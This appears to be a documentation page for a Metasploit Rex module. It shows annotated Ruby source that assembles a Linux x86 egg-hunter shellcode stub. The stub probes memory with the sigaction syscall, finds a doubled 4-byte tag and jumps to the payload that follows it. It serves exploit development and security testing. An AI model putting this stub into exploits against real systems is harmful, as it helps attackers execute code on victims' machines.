Module: Rex::Exploitation::Egghunter::Linux::X86
- Defined in:
- lib/rex/exploitation/egghunter.rb
Constant Summary
- Alias =
Rex::Arch::ARCH_X86
Instance Method Summary
-
#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object
The egg hunter stub for linux/x86.
Instance Method Details
#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object
The egg hunter stub for linux/x86.
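# The egg hunter stub for linux/x86.
#
# Scans memory one page at a time, using the sigaction syscall only as a
# "is this address readable?" probe, and looks for the 4-byte egg tag stored
# twice back to back. Once both copies are found the stub runs the optional
# checksum stub and then jumps to the bytes that follow the tag.
#
# @param payload [String] forwarded to checksum_stub only; this method does
#   not embed or inspect it itself
# @param badchars [String] forwarded to checksum_stub only
# @param opts [Hash] hunter options:
#   - :eggtag   [String] the egg marker; must be exactly 4 bytes
#   - :startreg [String, nil] register whose value the scan starts from;
#     when nil the scan starts from whatever ecx already holds
# @return [String] the assembled x86 stub bytes
# @raise [RuntimeError] if :eggtag is missing or is not exactly 4 bytes
def hunter_stub(payload, badchars = '', opts = {})
  # The tag is consumed with unpack('V'), i.e. as one 32-bit little-endian
  # word, so validate on byte size rather than character count, and reject a
  # missing tag with the intended RuntimeError instead of a NoMethodError.
  tag_size = 4
  egg_tag = opts[:eggtag]
  unless egg_tag.respond_to?(:bytesize) && egg_tag.bytesize == tag_size
    raise RuntimeError, "Invalid egg string! Need #{tag_size} bytes."
  end

  # Immediate for `mov eax, ...`: the tag as a little-endian dword, so scasd
  # compares it against memory in the same byte order the tag was written.
  marker = '0x%x' % egg_tag.unpack('V').first
  checksum = checksum_stub(payload, badchars, opts)

  # Optional prologue: seed ecx from the caller-chosen register and skip the
  # first page-align step so scanning begins exactly at that address.
  startreg = opts[:startreg]
  start_stub =
    if startreg
      seed = startreg.downcase == 'ecx' ? '' : "\n\tmov ecx,#{startreg}"
      "#{seed}\n\tjmp next_addr\n\t"
    else
      ''
    end

  assembly = <<EOS
    cld
    #{start_stub}
    check_readable:
    ; move to the last byte of the current page so the following inc ecx
    ; lands on the next page boundary
    or cx,0xfff
    next_addr:
    inc ecx
    ; sigaction(2) reads through ecx; an unreadable address yields -EFAULT,
    ; whose low byte is 0xf2, so the page is skipped without any other effect
    push 0x43 ; use 'sigaction' syscall
    pop eax
    int 0x80
    cmp al,0xf2
    je check_readable
    check_for_tag:
    ; check that the tag matches once
    mov eax,#{marker}
    mov edi,ecx
    scasd
    jne next_addr
    ; it must match a second time too
    scasd
    jne next_addr
    ; check the checksum if the feature is enabled
    #{checksum}
    ; jump to the payload
    jmp edi
EOS

  # edi now points just past the second tag copy; the assembled bytes are
  # the stub callers prepend to the payload.
  Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
end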